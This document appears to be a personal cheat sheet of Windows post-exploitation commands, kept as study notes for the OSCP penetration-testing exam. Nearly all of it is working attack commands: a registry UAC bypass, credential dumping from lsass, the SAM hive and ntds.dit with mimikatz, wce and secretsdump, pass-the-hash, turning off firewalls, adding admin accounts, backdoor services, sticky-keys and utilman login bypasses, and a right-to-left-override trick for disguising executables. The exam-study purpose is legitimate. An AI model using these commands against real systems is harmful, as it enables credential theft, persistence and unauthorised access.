|\ __________                          __   __                         __
         | |   __     |          _____ __    __\__/_|  |_ __ ___   _____   ___ |  |\_____     
         | |  /  \    |         /  _  \  \  /  /  |_    _|  /   \ /  _  \ /  _ \  |/  _  \    
         | |  \  /___ |        /  /_\  \  \/  /|  | |  |\|   /\  \  / \  \  / \   |  /_\  \   
         | |__/    _ \|        |  _____||    |\|  | |  | |  |\|  |  |\|  |  |\|   |  _____|\  
         | |___/\  \\_\        \  \____/  /\  \|  | |  | |  | |  |  \_/  /  \_/   |  \___ \|  
         | |    /   \_|         \_____/__/ /\__\__| |__| |__| |__|\_____/ \____/__|\_____/\   
         | |   / / \___|         \____\__\/  \__\__\|\__\|\__\|\__\\____\/ \___\\__\\____\/   
         | |__/_/_____|     
         |/                

Last changed: 17.06.2019

Windows post exploitation


This is another part of my notes I collected for the Offensive Security Certified Professional exam.

login information


username

whoami
net user %username%

system information


version and service pack info

ver
systeminfo

environment variables

set

hostname

hostname
net config workstation

running tasks

tasklist /V
taskkill /pid 1234

installed software

wmic product get name,vendor,version

uninstall security update

wusa /uninstall /kb:1234567 /quiet /norestart

group policies

gpresult /user victim /z > user_gpo.txt
gpresult /user victim /scope computer /z > computer_gpo.txt
nbtstat -n
nltest /dclist:target.domain
dir \\DC\SYSVOL\
robocopy /e \\DC\SYSVOL\target.domain\Policies .

user management


usernames and privileges

net user
net user Administrator /active:yes
net user Administrator new_password

create new admin user

net user admin password /add
net localgroup administrators admin /add

uac bypass

reg add "hkcu\software\classes\mscfile\shell\open\command" /t REG_SZ /d "c:\windows\system32\cmd.exe /c whoami /priv > c:\bypass.txt" /f
eventvwr.exe

hash extraction


lsass process

wce.exe
wce.exe -d

lsass process (meterpreter)

run post/windows/gather/hashdump

lsass process (mimikatz)

privilege::debug
sekurlsa::logonPasswords
token::whoami
token::elevate
lsadump::cache
lsadump::sam
sekurlsa::pth /user:Administrator /domain:. /ntlm:<admin-hash>

lsass core dump (mimikatz)

procdump -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" exit

registry

To dump hashes of local accounts from the registry creddump7 can be used.

reg save hklm\sam c:\SAM
reg save hklm\system c:\SYSTEM
reg save hklm\security c:\SECURITY
pwdump SYSTEM SAM
cachedump SYSTEM SECURITY True

domain controller

To extract password hashes from an active directory you will need the file ntds.dit and the SYSTEM registry hive from the domain controller. Then you can use the tools Libesedb and ntdsxtract.

esedbexport -m tables ntds.dit
dsuser.py datatable link_table output --syshive SYSTEM --passwordhashes --pwdformat ophc --ntoutfile hashes.nt -lmoutfile hashes.lm

Impacket can extract the hashes in one step

secretsdump.py -ntds ntds.dit -system SYSTEM -just-dc-ntlm LOCAL > hashes.txt

enable wdigest cleartext password storage

reg add hklm\system\currentcontrolset\control\securityproviders\wdigest /v UseLogonCredential /t REG_DWORD /d 1 /f

network configuration


network interfaces

ipconfig /all
netsh int ip set address "local area connection" static 10.0.0.11 255.255.255.0

modify routes

route print
route add 10.1.1.0 mask 255.255.255.0 192.168.11.3

enable IP forwarding

reg add hklm\system\currentcontrolset\services\remoteaccess \v Start \t REG_DWORD \d 2 \f
sc start remoteaccess

open ports

netstat -anb

disable firewall

netsh firewall set opmode disable
netsh advfirewall set allprofiles state off

enable remote desktop

reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall show rule name=all | find /i "remote" | find /i "desktop"
netsh advfirewall firewall set rule group="remote desktop" new enable=yes

login (from linux)

xfreerdp /u:user /p:password /v:<target>

file system


list disks

wmic logicaldisk get filesystem,freespace,name,size,volumename

searching

type file.txt | find /n /i "string"
dir /s /r | find ":$DATA"
forfiles /p c:\users /s /m *.exe /c "cmd /c echo @fdate @ftime @fsize @file"

volume shadow copy

Windows Server allows invoking shadow copies via vssadmin. This can help to copy files which are locked for reading.

vssadmin create shadow /for=c:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY SECURITY.bak

scheduled tasks


list tasks

schtasks.exe

create task

schtasks /create /sc minute /tn test /tr cmd.exe
schtasks /run /tn test
schtasks /delete /tn test /f

services


list services

sc query

create service

sc create new_service binpath= "cmd /K start c:\backdoor.exe" start=auto error=ignore
sc qc new_service

modify service

sc config new_service binpath= "cmd /K start c:\new_backdoor.exe"
sc start new_service

windows network


netbios discovery (from linux)

nbtscan -v 192.168.11.0/24
nmap 192.168.11.2 --script smb-enum-users.nse
nmap 192.168.11.2 --script smb-check-vulns.nse
rpcclient -U "" 192.168.11.2

netbios discovery (from windows)

nbtstat -A <target>

rpcclient

rpcclient -U user 10.168.11.2
$> srvinfo
$> enumdomains
$> enumdomusers

server message block


smb file share

net share
net share test=c:\test
net use x: \\<target>\test
net use x: /delete
net share test /delete

mount share in linux

mount -t cifs //<target>/test /mnt/cifs -o username=user

remote command execution

psexec -accepteula -u Administrator -p password //<target> <command>
winexe -U Administrator%password //<target> <command>
rpcclient -U Administrator <target>

parsing outlook mailbox


The libpst package contains tools for converting outlook .pst files

readpst -o extracted_mails mailbox.pst

persistent login bypass


sticky key

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f

ease of access

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f

hiding file extension


‮cod.yrammusevituc‭new.exe

&#x202e;cod.yrammusevituc&#x202d;new.exe